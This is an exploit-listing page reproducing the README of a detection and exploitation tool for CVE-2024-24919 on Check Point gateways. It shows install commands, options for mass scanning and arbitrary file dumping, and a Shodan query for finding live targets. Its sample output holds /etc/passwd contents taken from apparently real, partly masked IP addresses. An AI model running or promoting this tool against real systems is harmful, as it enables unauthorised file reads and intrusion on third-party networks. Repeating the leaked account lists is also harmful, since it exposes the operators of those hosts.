## https://sploitus.com/exploit?id=19B33FB7-5C74-50EB-BA63-77772D3A0EB0
# CVE-2024-24919
A vulnerability detection and exploitation tool for CVE-2024-24919.
### Installation:
```bash
git clone https://github.com/RevoltSecurities/CVE-2024-24919
# Enter the cloned repository so requirements.txt and exploit.py are found
cd CVE-2024-24919
pip install -r requirements.txt
python3 exploit.py --help
```
### Usage:
```console
python3 exploit.py -h
______ ____ __ _ ______
/ ____/ __/ __ \/ / ____ (_)_ __/__ _____
/ __/ | |/_/ /_/ / / / __ \/ / / / / _ \/ ___/
/ /____> </ ____/ /__/ /_/ / / / / / __/ /
/_____/_/|_/_/ /_____|____/_/ /_/ \___/_/
@RevoltSecurities
[Description]: Vulnerability Detection and Exploitation tool for CVE-2024-24919
options:
  -h, --help            show this help message and exit
  -u URL, --url URL     [INF]: Specify a URL or domain for vulnerability detection
  -l LIST, --list LIST  [INF]: Specify a list of URLs for vulnerability detection
  -ftd FILE_TO_DUMP, --file-to-dump FILE_TO_DUMP
                        [INF]: Specify a file path to dump (default: /etc/passwd)
  -t THREADS, --threads THREADS
                        [INF]: Number of threads for list of URLs
  -proxy PROXY, --proxy PROXY
                        [INF]: Proxy URL to send request via your proxy
  -v, --verbose         [INF]: Increases verbosity of output in console
  -o OUTPUT, --output OUTPUT
                        [INF]: Filename to save output of vulnerable target]
```
### Sample Usage:
```console
python3 exploit.py -l targets.txt -t 200 -o output.txt -ftd /etc/passwd
______ ____ __ _ ______
/ ____/ __/ __ \/ / ____ (_)_ __/__ _____
/ __/ | |/_/ /_/ / / / __ \/ / / / / _ \/ ___/
/ /____> </ ____/ /__/ /_/ / / / / / __/ /
/_____/_/|_/_/ /_____|____/_/ /_/ \___/_/
@RevoltSecurities
[Vulnerable]: https://185.200.78.XXXX
### Never edit this file manually. In order to login as expert and allow scp access, run "bashUser on" ###
root:!:0:0:root:/:/bin/false
nobody:x:99:99:nobody:/nonexistent:/bin/false
ntp:x:38:38::/nonexistent:/bin/false
rpm:x:37:37::/nonexistent:/bin/false
pcap:x:77:77::/nonexistent:/bin/false
admin:x:0:0:Linux User,,,:/:/bin/bash
saytel_adm:x:0:0:Linux User,,,:/:/bin/clish
davidg_adm:x:0:0:Linux User,,,:/:/bin/clish
sshd:x:74:74:Privilege-separated:/var/empty/sshd:/bin/false
[Vulnerable]: https://207.232.4XX.XXX
### Never edit this file manually. In order to login as expert and allow scp access, run "bashUser on" ###
root:!:0:0:root:/:/bin/false
nobody:x:99:99:nobody:/nonexistent:/bin/false
ntp:x:38:38::/nonexistent:/bin/false
rpm:x:37:37::/nonexistent:/bin/false
pcap:x:77:77::/nonexistent:/bin/false
admin:x:0:0:Linux User,,,:/:/bin/clish
sshd:x:74:74:Privilege-separated:/var/empty/sshd:/bin/false
wansup:x:0:0:Linux User,,,:/:/bin/clish
[Vulnerable]: https://81.218.166.XXX
### Never edit this file manually. In order to login as expert and allow scp access, run "bashUser on" ###
root:!:0:0:root:/:/bin/false
nobody:x:99:99:nobody:/nonexistent:/bin/false
ntp:x:38:38::/nonexistent:/bin/false
rpm:x:37:37::/nonexistent:/bin/false
pcap:x:77:77::/nonexistent:/bin/false
ace:x:0:0:Linux User,,,:/:/bin/clish
joker:x:0:0:Linux User,,,:/:/bin/clish
sshd:x:74:74:Privilege-separated:/var/empty/sshd:/bin/false
```
### Info:
Want to scrape targets and test them? Install our unique tool [ShodanX](https://github.com/Revoltsecurities/Shodanx) to get real-time Shodan data from your terminal.
To scrape targets, install ShodanX and use the command:
```console
shodanx custom -cq '"Server: Check Point SVN" "X-UA-Compatible: IE=EmulateIE7" 200' -fct ip -o targets.txt
_ _ __ __
| | | | \ \ / /
___ | |__ ___ __| | __ _ _ __ \ V /
/ __|| '_ \ / _ \ / _` | / _` || '_ \ > <
\__ \| | | || (_) || (_| || (_| || | | | / . \
|___/|_| |_| \___/ \__,_| \__,_||_| |_|/_/ \_\
Author : D.SanjaiKumar @CyberRevoltSecurities
[Version]:ShodanX current version v1.0.1 (latest)
[INFO]: Results Found for your query and facet: "Server: Check Point SVN" "X-UA-Compatible: IE=EmulateIE7" 200 & facet:"ip"
```
### About:
The tool is developed by [D.Sanjai Kumar @RevoltSecurities](https://www.linkedin.com/in/d-sanjai-kumar-109a7227b/) to detect and exploit the vulnerability CVE-2024-24919. The tool is for educational and ethical purposes only, and the
developers are not responsible for any illegal exploitation.